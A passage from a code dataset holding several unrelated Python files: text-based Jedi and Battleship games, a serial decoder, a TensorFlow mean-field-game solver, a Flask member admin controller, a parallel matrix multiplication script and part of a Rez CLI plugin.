json_file)","repo_name":"fredericsonergia/confomity-presence","sub_path":"src/CLI_conformity.py","file_name":"CLI_conformity.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41818690914","text":"import time\nimport random\n\nluke = {'name': \"Luke Skywalker\", 'power': 100, 'health': 300}\nobiwan = {'name': \"Obiwan Kenobi\", 'power': 150, 'health': 325}\nmonster = {'power': 75, 'health': 450}\n\nplayer = luke\n\nfinish = False\n\n\nprint(\"A battle begins! \"+player['name']+\" against Monster\")\n\nwhile finish == False:\n\n time.sleep(3)\n \n shield = 0\n print(\"\\n(1) Attack\")\n print(\"(2) Defense\")\n playermove = input(\"Choose one number for movement (1 or 2): \")\n\n if (playermove == \"1\"):\n\n print(player['name'] + \" will attack Monster\")\n \n dmg2monster = random.uniform(0.5*player['power'], player['power'])\n\n ##Create bonus damage by calculating weak point:\n num1 = random.randint(1, 100)\n num2 = random.randint(1, 100)\n print(\"\\nCalculate weak point for bonus damage:\")\n\n time1 = time.time()\n answer = input(str(num1) + \" + \" + str(num2) + \"= \")\n waittime = time.time() - time1\n\n if (waittime < 3) and (num1 + num2 == int(answer)):\n dmg2monster = 1.5*dmg2monster\n print(\"Monster will get bonus damage!\")\n else:\n print(\"Monster will get normal damage..\")\n\n else:\n\n print(player['name'] + \" will be defensive\")\n shield = 1\n\n time.sleep(2)\n \n monstershield = 0\n monstermove = random.randint(1, 2)\n if monstermove == 1:\n print(\"\\nMonster will attack \" + player['name'])\n dmg2player = random.uniform(0.5*monster['power'], monster['power'])\n else:\n print(\"\\nMonster will be defensive\")\n monstershield = 1\n\n time.sleep(2)\n\n #RESULT:\n if (playermove == \"1\"):\n monster['health'] = monster['health'] - dmg2monster*(1-0.5*monstershield)\n print(\"Monster is damaged by \" + str(dmg2monster*(1-0.5*monstershield)))\n\n time.sleep(2)\n \n if monster['health'] < 0:\n print(\"Player Wins\")\n finish = True\n break\n \n if (monstermove == 1):\n player['health'] = player['health'] - dmg2player*(1-0.5*shield)\n print(\"Player is damaged by \" + str(dmg2player*(1-0.5*shield)))\n\n time.sleep(2)\n\n if player['health'] < 0:\n print(\"Player Defeated\")\n finish = True\n break\n \n print(\"\\nResult: \")\n \n print(player['name'])\n print(\"Health Point: \" + str(player['health']))\n print(\"\\nMonster\")\n print(\"Health Point: \" + str(monster['health']))\n\n time.sleep(2)\n","repo_name":"anbarief/Blog","sub_path":"Tutorial/jedi_vs_monster.py","file_name":"jedi_vs_monster.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"31180714537","text":"from random import randint\nimport os\n\nboard = []\nplayer = \"Choice\"\nplay = \"y\"\n\nwhile play == \"y\":\n\n #player = input(\"Do you want to play Single Mode or Dual Mode (S/D): \")\n\n i = 2;\n while (i < 3 or i > 9) :\n i = int(input(\"Choose your board size: \"))\n if i < 3:\n print(\"Choose a size larger than 2\")\n elif i > 9:\n print(\"Choose a size smaller than 10\")\n\n for x in range(i):\n board.append([\"O\"] * i)\n\n\n def print_board(board):\n for row in board:\n print((\" \").join(row))\n\n\n def random_row(board):\n return randint(0, len(board) - 1)\n\n\n def random_col(board):\n return randint(0, len(board[0]) - 1)\n\n #if(player is \"S\"):\n #Aurielle & Luna's Code\n def get_username():\n username_file = \"username.txt\"\n if not os.path.isfile(username_file):\n fo = open(username_file, \"a\")\n fo.close()\n\n if os.stat(username_file).st_size == 0:\n fo = open(username_file, \"a+\")\n print(\"No saved username.\")\n username = input(\"Enter username:\")\n choice = input(\"Enter 1 to save username or enter any key to continue : \")\n if choice == \"1\":\n fo.write(username + \"\\n\")\n fo.close()\n\n else:\n fo = open(username_file, \"r\")\n lines = fo.readlines()\n num = 1\n for line in lines:\n print(num, line.strip())\n num += 1\n username_num = int(input(\"Enter the number of your username or enter 0 to add new username:\"))\n if username_num == 0:\n username = input(\"Enter username:\")\n choice = input(\"Enter 1 to save username or enter any key to continue\")\n if choice == \"1\":\n fo = open(username_file, \"a+\")\n fo.write(username + \"\\n\")\n fo.close()\n else:\n while username_num > num:\n print(\"Invalid input!\")\n username_num = int(input(\"Enter the number of your username:\"))\n fo = open(username_file, \"r\")\n username = \"\"\n for count in range(username_num):\n username = fo.readline()\n fo.close()\n username = username.strip()\n print(\"Welcome \" + username + \"!\")\n print(\"Let's play Battleship!\")\n #File handling ---- done\n\n def ask_guess():\n guess_num = int(input(\"Enter the number of turns you need (from 1-20): \"))\n while guess_num < 1 or guess_num > 20:\n print(\"Invalid input!\")\n guess_num = int(input(\"Enter the number of turns you need (from 1-20): \"))\n return guess_num\n\n #if(player is \"S\"):\n get_username()\n\n guess_num = ask_guess()\n print_board(board)\n ship_row = random_row(board)\n ship_col = random_col(board)\n\n turn_left = guess_num - 1;\n\n #Random position\n def random_pos(board):\n return randint(0, len(board) - 1)\n\n ship_row = []\n ship_col = []\n\n # number of ships = row size - 1\n for ships in range(i - 2):\n ship_row.append(random_pos(board))\n ship_col.append(random_pos(board))\n print(\"There is a ship at row\", ship_row[ships] + 1, \"column\", ship_col[ships] + 1)\n\n ships = i - 2\n\n #Playing the Game\n for turn in range(guess_num):\n print(guess_num - turn, \"turns left\")\n guess_row = (int(input(\"Guess Row: \")) - 1)\n guess_col = (int(input(\"Guess Col: \")) - 1)\n\n if guess_row in ship_row and guess_col in ship_col:\n board[guess_row][guess_col] = \"@\"\n ships -= 1\n if ships == 0:\n print(\"Congratulations! You sunk all my battleship!\")\n break\n else:\n print(\"You sunk my battleship!\", ships, \"more remaining\")\n elif (guess_row < 0 or guess_row > i - 1) or (guess_col < 0 or guess_col > i - 1):\n print(\"Oops, that's not even in the ocean.\")\n turn -= 1\n elif board[guess_row][guess_col] == \"X\":\n print(\"You guessed that one already.\")\n turn -= 1\n else:\n print(\"You missed my battleship!\")\n board[guess_row][guess_col] = \"X\"\n\n if turn + 1 == guess_num:\n print(\"Game Over\")\n for x in range(i - 2):\n board[int(ship_row[x])][int(ship_col[x])] = \"@\"\n print_board(board)\n\n play = input(\"Try again?(y/n) : \")\n print(\" \")\n","repo_name":"lunamk24/Battleship_Game_Project","sub_path":"Battleship.py","file_name":"Battleship.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6443668292","text":"import sys\nimport numpy as np\nimport struct\nimport serial\n\nif len(sys.argv) != 3:\n print(\"Usage: {} \".format(sys.argv[0]))\n sys.exit()\n\nser = serial.Serial(sys.argv[1], sys.argv[2])\ndat = ser.read(8192*2)\ndat = np.array(struct.unpack(\"<{}h\".format(8192), dat)).astype(np.float)\nt = np.linspace(0, 18/100e6, 18)\n\ndat = (dat > 0).astype(np.uint8)\ndat = dat[::4]\n\nprint(''.join(str(x) for x in dat))\n","repo_name":"adamgreig/basebandboard","sub_path":"software/memdump/decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26899883514","text":"# authors: Sara Bicego, Matteo Butano\n# emails: s.bicego21@imperial.ac.uk, matteo.butano@universite-paris-saclay.fr\n\nfrom DGM import DGMNet\nimport pandas as pd\nimport tensorflow as tf\nfrom keras import backend as K\nimport numpy as np\nimport random\nimport os\nimport json\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport datetime\n\n\nclass dgm_net:\n \n def __init__(self):\n '''\n Initialise the two NNs for Phi and Theta, creates points.\n\n Returns\n -------\n None.\n\n '''\n \n with open('config.json') as f:\n var = json.loads(f.read())\n \n self.DTYPE = 'float32'\n self.var = var\n \n # MFG parameters \n self.xi = var['mfg_params']['xi']\n self.c_s = var['mfg_params']['c_s']\n self.mu = var['mfg_params']['mu']\n self.m_0 = var['room']['m_0']\n self.g = -(2*self.xi**2)/self.m_0\n self.sigma = np.sqrt(2*self.xi*self.c_s)\n self.l = -self.g*self.m_0\n self.R = 0.37\n self.s = tf.constant([0, -var['room']['s']], dtype=self.DTYPE, shape=(1, 2))\n self.pot = var['mfg_params']['V']\n \n # NN parameters\n self.training_steps = var['dgm_params']['training_steps']\n self.learning_rate = var['dgm_params']['learning_rate']\n \n # Room definition \n self.lx = var['room']['lx']\n self.ly = var['room']['ly']\n self.N_b = int(var['room']['N_b'])\n self.N_in = int(var['room']['N_in'])\n \n # Initial total mass\n self.total_mass = tf.constant(self.m_0*(2*self.lx)*(2*self.ly),dtype=self.DTYPE)\n \n # Seed value\n self.seed_value = 0\n os.environ['PYTHONHASHSEED'] = str(self.seed_value)\n \n # Initialize random variables for repoducibility\n random.seed(self.seed_value)\n np.random.seed(self.seed_value)\n tf.random.set_seed(self.seed_value)\n session_conf = tf.compat.v1.ConfigProto(intra_op_parallelism_threads=0,\n inter_op_parallelism_threads=0)\n \n sess = tf.compat.v1.Session(graph=tf.compat.v1.get_default_graph(), config=session_conf)\n K.set_session(sess)\n \n # Set data type\n tf.keras.backend.set_floatx(self.DTYPE)\n \n self.phi_theta = DGMNet(var['dgm_params']['nodes_per_layer'],\n var['dgm_params']['RNN_layers'],\n var['dgm_params']['FNN_layers'], 2,\n var['dgm_params']['activation'])\n \n self.gamma_theta = DGMNet(var['dgm_params']['nodes_per_layer'],\n var['dgm_params']['RNN_layers'],\n var['dgm_params']['FNN_layers'], 2,\n var['dgm_params']['activation'])\n \n self.X_b, self.X_in, self.X_out = self.sample_room()\n \n self.all_pts = tf.constant(tf.concat([self.X_out,self.X_in,self.X_b],axis = 0))\n \n self.history = []\n \n return\n \n def V(self,phi,gamma):\n '''\n Describes the potential of the cost-functional\n\n Parameters\n ----------\n phi : tensorflow.tensor\n Values of phi_theta over training points.\n gamma : tensorflow.tensor\n Values of gamma_theta over training points.\n\n Returns\n -------\n tensorflow.tensor\n Values of the potential over the training points.\n\n '''\n \n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n U0 = np.zeros(shape = (self.N_b + self.N_in,1))\n \n U0[np.sqrt(all_pts[:,0]**2 + all_pts[:,1]**2) < self.R] = self.pot\n \n U0 = tf.constant(U0, dtype=self.DTYPE)\n \n mean_field = tf.math.scalar_mul(self.g,tf.multiply(phi,gamma))\n \n return mean_field + U0 # formula for the potential from reference \n \n def sample_room(self):\n '''\n Samples the training points, randomly over simulation area.\n\n Returns\n -------\n pandas.DataFrame, pandas.DataFrame, pandas.DataFrame\n Three dataframes containing boundary points, points inside and outside the cylinder.\n\n '''\n \n # Lower bounds\n lb = tf.constant([-self.lx, -self.ly], dtype=self.DTYPE)\n # Upper bounds\n ub = tf.constant([self.lx, self.ly], dtype=self.DTYPE)\n \n # Draw uniform sample points for data in the domain\n x_room = tf.random.uniform((self.N_in, 1), lb[0], ub[0], dtype=self.DTYPE)\n y_room = tf.random.uniform((self.N_in, 1), lb[1], ub[1], dtype=self.DTYPE)\n X_room = tf.concat([x_room, y_room], axis=1)\n \n # Divide between points inside and outside the cylinder\n points_in = tf.where(tf.norm(X_room, axis=1) <= self.R)\n points_out = tf.where(tf.norm(X_room, axis=1) > self.R)\n X_in = tf.gather(X_room, points_in)\n X_out = tf.gather(X_room, points_out)\n X_in = tf.squeeze(X_in)\n X_out = tf.squeeze(X_out)\n \n # Boundary data (square - outside walls)\n x_b1 = lb[0] + (ub[0] - lb[0]) * tf.keras.backend.random_bernoulli((int(self.N_b/2), 1), 0.5, dtype=self.DTYPE)\n y_b1 = tf.random.uniform((int(self.N_b/2), 1), lb[1], ub[1], dtype=self.DTYPE)\n y_b2 = lb[1] + (ub[1] - lb[1]) * tf.keras.backend.random_bernoulli((int(self.N_b/2), 1), 0.5, dtype=self.DTYPE)\n x_b2 = tf.random.uniform((int(self.N_b/2), 1), lb[0], ub[0], dtype=self.DTYPE)\n x_b = tf.concat([x_b1, x_b2], axis=0)\n y_b = tf.concat([y_b1, y_b2], axis=0)\n X_b = tf.concat([x_b, y_b], axis=1)\n\n return pd.DataFrame(X_b.numpy()), pd.DataFrame(X_in.numpy()), pd.DataFrame(X_out.numpy())\n \n def get_loss(self,verbose):\n '''\n Computes loss function by calculating the residuals.\n\n Returns\n -------\n tensorflow.tensor\n Loss function sum of the different residuals. The default is True.\n\n '''\n \n all_pts = tf.Variable(tf.concat([self.X_out,self.X_in,self.X_b],axis = 0))\n \n # Compute gradient and laplacian for Phi\n \n with tf.GradientTape() as phi_tape_1:\n with tf.GradientTape() as phi_tape_2:\n \n phi = self.phi_theta(all_pts)\n \n grad_phi = phi_tape_2.gradient(phi,all_pts)\n \n jac_phi = phi_tape_1.gradient(grad_phi,all_pts)\n lap_phi = tf.math.reduce_sum(jac_phi,axis = 1)\n \n # Compute gradient and laplacian for Gamma\n \n with tf.GradientTape() as gamma_tape_1:\n with tf.GradientTape() as gamma_tape_2:\n \n gamma = self.gamma_theta(all_pts)\n \n grad_gamma = gamma_tape_2.gradient(gamma,all_pts)\n \n jac_gamma = gamma_tape_1.gradient(grad_gamma,all_pts)\n lap_gamma = tf.math.reduce_sum(jac_gamma,axis = 1)\n \n res_HJB = tf.reduce_mean(self.l*phi +self.V(phi,gamma)*phi + 0.5*self.mu*self.sigma**4*lap_phi - self.mu*self.sigma**2*tf.reduce_sum(self.s*grad_phi,axis = 1))**2\n \n res_KFP = tf.reduce_mean(self.l*gamma +self.V(phi,gamma)*gamma + 0.5*self.mu*self.sigma**4*lap_gamma + self.mu*self.sigma**2*tf.reduce_sum(self.s*grad_gamma,axis = 1))**2\n \n res_b_phi = tf.reduce_mean((tf.sqrt(self.m_0) - self.phi_theta(self.X_b))**2)\n res_b_gamma = tf.reduce_mean((tf.sqrt(self.m_0) - self.gamma_theta(self.X_b))**2)\n \n res_obstacle = tf.reduce_mean(self.phi_theta(self.X_in)**2) + tf.reduce_mean(self.gamma_theta(self.X_in)**2)\n \n res_total_mass = (tf.reduce_mean(phi*gamma)*(2*self.lx)*(2*self.ly)-self.total_mass)**2\n \n if verbose: \n print(' {:10.3e} {:10.3e} {:10.3e} {:10.3e} {:10.3e} {:10.3e}'.format(res_HJB,res_KFP,res_b_phi,res_b_gamma,res_obstacle,res_total_mass))\n \n self.history.append([res_HJB.numpy(),res_KFP.numpy(),res_b_phi.numpy(),res_b_gamma.numpy(),res_obstacle.numpy(),res_total_mass.numpy()])\n \n return res_HJB + res_KFP + res_b_gamma + res_b_phi + res_obstacle + res_total_mass\n \n def train_step(self,f_theta,verbose):\n '''\n Applies one training to the NN in input\n\n Parameters\n ----------\n f_theta : DGMNet\n Neural network created using the DGM package.\n\n Returns\n -------\n f_loss : tensorflow.tensor\n Value of the loss function.\n\n '''\n \n optimizer = tf.optimizers.Adam(learning_rate = self.learning_rate)\n \n with tf.GradientTape() as f_tape:\n \n f_vars = f_theta.trainable_weights\n f_tape.watch(f_vars)\n f_loss = self.get_loss(verbose)\n f_grad = f_tape.gradient(f_loss,f_vars)\n \n optimizer.apply_gradients(zip(f_grad, f_vars))\n \n return f_loss\n \n def train(self,verbose = True):\n '''\n Applies self.training_steps. \n \n Parameters\n ----------\n verbose : Bool\n When true prints the value of each residual at each iteration.\n\n Returns\n -------\n None.\n\n '''\n \n if verbose:\n print(' #iter res_HJB res_KFP res_b_phi res_b_gamma res_obstacle res_total_mass')\n print('-----------------------------------------------------------------------------------------------------------------')\n \n for step in range(1,self.training_steps + 1):\n \n if verbose:\n print('{:6d}'.format(step),end=\"\")\n \n # Train phi \n self.train_step(self.phi_theta,verbose)\n \n if verbose:\n print(' ',end=\"\")\n \n # Compute loss for phi and gamma\n \n self.train_step(self.gamma_theta,verbose)\n \n def warmstart_step(self,f_theta,f_IC,points_IC):\n '''\n Applies one step of warmstart. \n\n Parameters\n ----------\n f_theta : DGMNet\n Either Phi_theta or Gamma_theta.\n f_IC : numpy.array\n Values of the exact solution for Phi or Gamma reshaped as (nx*ny,1).\n points_IC : numpy.array\n Coordinates of the exact solution's grid reshaped as (nx*ny,1).\n\n Returns\n -------\n f_loss : tensorflow.tensor\n MSE of the difference between NNs and the exact solution.\n\n '''\n \n #all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n optimizer = tf.optimizers.Adam(learning_rate = self.learning_rate)\n \n f_IC = pd.DataFrame(f_IC).astype(dtype = self.DTYPE)\n points_IC = pd.DataFrame(points_IC).astype(dtype = self.DTYPE)\n \n # Compute gradient wrt variables for phi and gamma\n \n with tf.GradientTape() as f_tape:\n \n f_vars = f_theta.trainable_weights\n f_tape.watch(f_vars)\n f_prediction = f_theta(points_IC)\n f_loss = tf.reduce_mean((f_prediction - f_IC)**2)\n f_grad = f_tape.gradient(f_loss,f_vars)\n \n optimizer.apply_gradients(zip(f_grad, f_vars))\n \n return f_loss\n \n def warmstart_step_simple(self,f_theta):\n '''\n One step of warmstart with simple IC\n\n Parameters\n ----------\n f_theta : dgmnet\n The net to which apply one step of warmstart.\n\n Returns\n -------\n f_loss : tf.tensor\n The value of the loss after one step of ws.\n\n '''\n \n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n optimizer = tf.optimizers.Adam(learning_rate = self.learning_rate)\n \n # Compute gradient wrt variables for phi and gamma\n \n with tf.GradientTape() as f_tape:\n \n f_vars = f_theta.trainable_weights\n f_tape.watch(f_vars)\n f_prediction = f_theta(all_pts)\n f_loss = tf.reduce_mean((f_prediction - tf.sqrt(self.m_0))**2)\n f_grad = f_tape.gradient(f_loss,f_vars)\n \n optimizer.apply_gradients(zip(f_grad, f_vars))\n \n return f_loss\n \n def warmstart(self,phi_IC,gamma_IC,points_IC):\n '''\n Applies self.training_steps of warmstart\n\n Parameters\n ----------\n phi_IC : numpy.array\n Values of the exact solution for Phi reshaped as (nx*ny,1).\n gamma_IC : numpy.array\n Values of the exact solution for Gamma reshaped as (nx*ny,1)..\n points_IC : numpy.array\n Coordinates of the exact solution's grid reshaped as (nx*ny,1).\n\n Returns\n -------\n None.\n\n '''\n phi_loss = 1\n gamma_loss = 1\n step = 0\n \n while np.maximum(phi_loss,gamma_loss) > 10e-3:\n \n # Compute loss for phi and gamma\n \n phi_loss = self.warmstart_step(self.phi_theta,phi_IC,points_IC)\n gamma_loss = self.warmstart_step(self.gamma_theta,gamma_IC,points_IC)\n \n if step % 100 == 0:\n print('WS step {:5d}, loss phi={:10.3e}, loss gamma={:10.3e}'.format(step, phi_loss,gamma_loss))\n \n step +=1\n \n def warmstart_simple(self,verbose=True):\n '''\n Simple warmstart towards sqrt(m_0) condition. \n\n Parameters\n ----------\n verbose : Bool, optional\n Shows info bout the simple warmstart. The default is True.\n\n Returns\n -------\n None.\n\n '''\n \n phi_loss = 1\n gamma_loss = 1\n step = 0\n \n while np.maximum(phi_loss,gamma_loss) > 10e-3:\n \n # Compute loss for phi and gamma\n \n phi_loss = self.warmstart_step_simple(self.phi_theta)\n gamma_loss = self.warmstart_step_simple(self.gamma_theta)\n \n if verbose:\n print('WS step {:5d}, loss phi={:10.3e}, loss gamma={:10.3e}'.format(step, phi_loss,gamma_loss))\n \n step +=1\n \n \n def draw(self):\n '''\n Draw the scatter plot of the density of pedestrians.\n\n Returns\n -------\n None.\n\n '''\n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n m = self.gamma_theta(all_pts)*self.phi_theta(all_pts)\n \n plt.figure(figsize=(8,8))\n plt.scatter(all_pts.numpy()[:,0], all_pts.numpy()[:,1], c=m, cmap='hot_r')\n plt.xlabel('$x$')\n plt.ylabel('$y$')\n plt.colorbar()\n plt.clim(vmin = 0)\n plt.show() \n \n def save(self):\n '''\n Save into 'trainings' directory some info about the training. \n\n Returns\n -------\n None.\n\n '''\n \n if not os.path.exists('./trainings'):\n os.mkdir('./trainings')\n \n current_time = datetime.datetime.now()\n dirname = current_time.strftime(\"%B %d, %Y %H-%M-%S\")\n \n if not os.path.exists('./trainings/' + dirname):\n os.mkdir('./trainings/' + dirname)\n \n labels = ['res_HJB', 'res_KFP', 'res_b_phi', 'res_b_gamma', 'res_obstacle', 'res_total_mass']\n history = np.array(self.history)\n fig, ax = plt.subplots(nrows = 2,ncols=3,figsize = (15,10))\n\n for col in range(history.shape[1]):\n \n ax[col//3,col%3].plot(history[:,col])\n ax[col//3,col%3].set_title(labels[col])\n \n plt.savefig('./trainings/' + dirname + '/residuals')\n \n training = {}\n\n training['config'] = self.var\n training['phi_theta'] = self.phi_theta(self.all_pts).numpy().tolist()\n training['gamma_theta'] = self.gamma_theta(self.all_pts).numpy().tolist()\n training['points'] = self.all_pts.numpy().tolist()\n \n # Serializing json\n json_object = json.dumps(training, indent=4)\n \n # Writing to sample.json\n with open(\"./trainings/\" + dirname + \"/net.json\", \"w\") as outfile:\n outfile.write(json_object)\n \n all_pts = tf.concat([self.X_out,self.X_in,self.X_b],axis = 0)\n \n m = self.gamma_theta(all_pts)*self.phi_theta(all_pts)\n \n plt.figure(figsize=(8,8))\n plt.scatter(all_pts.numpy()[:,0], all_pts.numpy()[:,1], c=m, cmap='hot_r')\n plt.xlabel('$x$')\n plt.ylabel('$y$')\n plt.colorbar()\n plt.clim(vmin = 0)\n \n plt.savefig('./trainings/' + dirname + '/density')\n \n","repo_name":"binchengecon/InequalityEcon_Shrink","sub_path":"MFG/neural_mfg.py","file_name":"neural_mfg.py","file_ext":"py","file_size_in_byte":16913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34512685802","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint,request,redirect,jsonify\nfrom common.libs.Helper import ops_render,iPagination,getCurrentDate\nfrom common.libs.UrlManager import UrlManager\nfrom common.libs.user.UserService import UserService\nfrom common.models.log.AppAccessLog import AppAccessLog\nfrom common.models.User import User\nfrom sqlalchemy import or_\nfrom application import app, db\nfrom common.models.member.Member import Member\n\nroute_member = Blueprint('member_page', __name__)\n\n\n@route_member.route(\"/index\")\ndef index():\n resp_data = {}\n req = request.values\n page = int(req['p']) if ('p' in req and req['p']) else 1\n query = Member.query\n\n if 'mix_kw' in req:\n rule = or_(Member.nickname.ilike(\"%{0}%\".format(req['mix_kw'])), Member.mobile.ilike(\"%{0}%\".format(req['mix_kw'])))\n query = query.filter(rule)\n\n if 'status' in req and int(req['status']) > -1:\n query = query.filter(Member.status == int(req['status']))\n\n page_params = {\n 'total': query.count(),\n 'page_size': app.config['PAGE_SIZE'],\n 'page': page,\n 'display': app.config['PAGE_DISPLAY'],\n 'url': request.full_path.replace(\"&p={}\".format(page), \"\")\n }\n\n pages = iPagination(page_params)\n offset = (page - 1) * app.config['PAGE_SIZE']\n limit = app.config['PAGE_SIZE'] * page\n\n list = query.order_by(Member.id.desc()).all()[offset:limit]\n\n resp_data['list'] = list\n resp_data['pages'] = pages\n resp_data['search_con'] = req\n resp_data['status_mapping'] = app.config['STATUS_MAPPING']\n print(resp_data, '**********')\n return ops_render( \"member/index.html\",resp_data )\n\n\n@route_member.route(\"/set\", methods=[\"GET\", \"POST\"])\ndef set():\n default_pwd = \"******\"\n if request.method == \"GET\":\n resp_data = {}\n req = request.args\n id = int(req.get(\"id\", 0))\n info = None\n if id:\n info = Member.query.filter_by(id=id).first()\n resp_data['info'] = info\n return ops_render(\"member/set.html\", resp_data)\n\n resp = {'code': 200, 'msg': '操作成功~~', 'data': {}}\n req = request.values\n\n id = req['id'] if 'id' in req else 0\n nickname = req['nickname'] if 'nickname' in req else ''\n group_name = req['group_name'] if 'group_name' in req else ''\n\n if group_name is None or len(group_name) < 1:\n resp['code'] = -1\n resp['msg'] = \"请输入符合规范的组名~~\"\n return jsonify(resp)\n\n\n # has_in = Member.query.filter(Member.group_name == login_name, User.uid != id).first()\n # if has_in:\n # resp['code'] = -1\n # resp['msg'] = \"该登录名已存在,请换一个试试~~\"\n # return jsonify(resp)\n\n member_info = Member.query.filter_by(id=id).first()\n if member_info:\n model_member = member_info;\n else:\n resp['code'] = -1\n resp['msg'] = \"当前账号信息不存在,请确认后修改~~\"\n return jsonify(resp)\n model_member.group_name = group_name;\n model_member.nickname = nickname;\n model_member.updated_time = getCurrentDate()\n db.session.add(model_member)\n ret = db.session.commit()\n return jsonify(resp)\n\n\n","repo_name":"yuewei1987/geekbar_backgroud","sub_path":"web/controllers/member/Member.py","file_name":"Member.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11005386434","text":"a = [35,49,53,61,78,84,96,121,132,149]\ni = 0\nz = 0\nm = a[0]\nt = a[0]\nmedia = 0\nwhile(i != 9):\n z = a[i + 1] - a[i]\n if z > 0:\n p = a[i + 1] - t\n if p > 0:\n t = a[i + 1]\n if z < 0:\n p = m - a[i + 1]\n if p > 0:\n m = a[i + 1]\n i += 1\nprint(f\"max: {t} min: {m}\")\ni = 0\nmedia = 1\nwhile(media > 0):\n media = t - m - (2 * i)\n #print(f\"media: {media} i: {i}\")\n i += 1\noutput = i - 1\n\nmedia = m + output\n\nprint(f\"resultado por agoritmo instruido: {media}\")\navrage = sum(a)/len(a)\nprint(f\"promedio obtenido forma tradicional: {avrage}\")\n\n#este es mi algoritmo, no modifique el original\ni = 0\nmedia = 1\nwhile(media > 0):\n media = sum(a) - 10 * i\n i += 1\noutput = i - 1\n\nprint(f\"promedio obtenido con mi agloritmo: {output}\")\n \nimport random\nfor _ in range(96):\n randomlist = random.sample(range(0, 1024), 10)\n for i in randomlist:\n print(i)\n ","repo_name":"DemiurgeApeiron/A01028325-InternetOfThings","sub_path":"act3/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71753612722","text":"# %%\nimport numpy as np\nimport multiprocessing\nimport os\nfrom numpy import genfromtxt\nfrom optparse import OptionParser\nimport math\n\nprint('Parallel Matrix Multiplication')\n\n# %%\ndef lineMult(start):\n global A, B, C, part\n n = len(A)\n # print('starts from {} and ends {}'.format(start, start+part))\n for i in range(start, start+part):\n for k in range(n):\n for j in range(n):\n C[i][j] += A[i][k] * B[k][j]\n return C\n\n# %%\ndef ikjMatrixProduct(A, B, num_thread):\n n = len(A)\n pool = multiprocessing.Pool(num_thread)\n # print(list(range(0, n, part)))\n results = pool.map(lineMult, list(range(0,n, part)))\n return sum(results)\n\n# %%\nbase_path='./test_data'\n\n\n# %%\nif __name__ == \"__main__\":\n parser = OptionParser()\n # takes size as an arg\n parser.add_option(\"-s\",\n dest=\"size\",\n default=\"2\",\n help=\"input matrix size\")\n\n parser.add_option(\"-t\",\n dest=\"thread\",\n default=\"1\",\n help=\"input thread number\")\n (options, args) = parser.parse_args()\n\n print('Matrix Size: {}'.format(options.size))\n print('Thread Number: {}'.format(options.thread))\n\n size = options.size\n num_thread = int(options.thread)\n\n file_A = 'A_' + str(size) + '.csv'\n file_B = 'B_' + str(size) + '.csv'\n path_A = os.path.join(base_path, file_A)\n path_B = os.path.join(base_path, file_B)\n\n A = genfromtxt(path_A, delimiter=',')\n B = genfromtxt(path_B, delimiter=',')\n \n n, m,l= len(A), len(A[0]), len(B[0])\n C = np.zeros((n, l))\n part = int(len(A) / num_thread)\n if part < 1:\n part = 1\n C = ikjMatrixProduct(A, B, num_thread)\n\n print()","repo_name":"hansensen/MultiprocessorSystemProject","sub_path":"2_vanilla_parallel.py","file_name":"2_vanilla_parallel.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28264480236","text":"\"\"\"\nRez suite composing GUI\n\"\"\"\nimport os\nimport sys\nimport types\nimport argparse\ntry:\n from rez.command import Command\nexcept ImportError:\n Command = object\n\n\ncommand_behavior = {}\n\n\ndef rez_cli():\n from rez.cli._main import run\n from rez.cli._entry_points import check_production_install\n check_production_install()\n try:\n return run(\"sweet\")\n except KeyError:\n pass\n # for rez version that doesn't have Command type plugin\n return standalone_cli()\n\n\ndef standalone_cli():\n # for running without rez's cli\n parser = argparse.ArgumentParser(\"sweet\")\n setup_parser(parser)\n opts = parser.parse_args()\n return command(opts)\n\n\ndef setup_parser(parser, completions=False):\n parser.add_argument(\"--version\", action=\"store_true\",\n help=\"Print out version of this plugin command.\")\n parser.add_argument(\"--gui\", action=\"store_true\")\n\n\ndef command(opts, parser=None, extra_arg_groups=None):\n import logging\n from sweet import cli, report\n report.init_logging()\n\n if opts.debug:\n log = logging.getLogger(\"sweet\")\n stream_handler = next(h for h in log.handlers if h.name == \"stream\")\n stream_handler.setLevel(logging.DEBUG)\n\n if opts.version:\n from sweet._version import print_info\n sys.exit(print_info())\n\n if opts.gui:\n from sweet.gui import app\n sys.exit(app.launch())\n\n return cli.main()\n\n\nclass CommandSweet(Command):\n schema_dict = {\n \"suite_roots\": dict,\n \"default_root\": str,\n \"release_root\": str,\n \"on_suite_saved_callback\": types.FunctionType,\n \"omit_internal_version\": str,\n }\n\n @classmethod\n def name(cls):\n return \"sweet\"\n\n\ndef find_configs(dir_path):\n configs = list()\n\n while True:\n config_file = os.path.join(dir_path, \".rezconfig.py\")\n if os.path.isfile(config_file):\n configs.append(config_file)\n\n parent_dir = os.path.dirname(dir_path)\n if parent_dir == dir_path:\n break # reach root\n\n dir_path = parent_dir\n\n return configs\n\n\ndef _FWD__invoke_suite_tool_alias_in_live(package_requests,\n context_name,\n tool_name,\n prefix_char=None,\n _script=None,\n _cli_args=None):\n # Load configs\n from rez.resolved_context import ResolvedContext\n from rez.config import _load_config_from_filepaths, config\n # todo: config override should be handled by the Application\n # launcher, not 